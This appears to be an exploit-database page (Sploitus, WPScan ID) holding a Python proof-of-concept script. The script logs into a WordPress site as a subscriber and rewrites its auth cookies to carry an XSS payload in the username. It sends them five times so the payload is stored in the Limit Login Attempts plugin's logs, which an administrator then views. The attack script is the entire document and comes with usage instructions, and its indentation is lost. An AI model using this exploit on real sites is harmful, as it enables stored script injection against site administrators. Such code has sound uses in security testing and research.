Share
## https://sploitus.com/exploit?id=WPEX-ID:461CBCCA-AED7-4C92-BA35-EBABF4FCD810
import requests
import sys
import re
if len(sys.argv) != 4:
print('USAGE: python %s <target_url> <user_login> <user_pass>' % (sys.argv[0],))
sys.exit()
url = sys.argv[1].rstrip('/')
with requests.Session() as s:
print('Logging in...')
# Log into WordPress using our Subscriber account
res = s.post(
url + '/wp-login.php',
headers={ 'Cookie': 'wordpress_test_cookie=WP Cookie check' },
data={'log':sys.argv[2], 'pwd':sys.argv[3], 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie':1})
# Send 5 corrupted cookies with malicious usernames in them
print('Sending corrupted cookies 5 times..')
for cookie in s.cookies.keys():
if re.match(r'wordpress_[0-9a-f]+', cookie):
malicious_payload = s.cookies.get(name=cookie, path='/').replace(sys.argv[2], 'MALICIOUS_USERNAME<svg/onload=alert(1)//>')
s.cookies.set(name=cookie, value=None, path='/')
s.cookies.set(name=cookie, value=malicious_payload, path='/')
for i in range(5):
s.get( url + '/wp-admin/')
print(f'View limit-login-attempts logs now at {sys.argv[1]}/wp-admin/options-general.php?page=limit-login-attempts')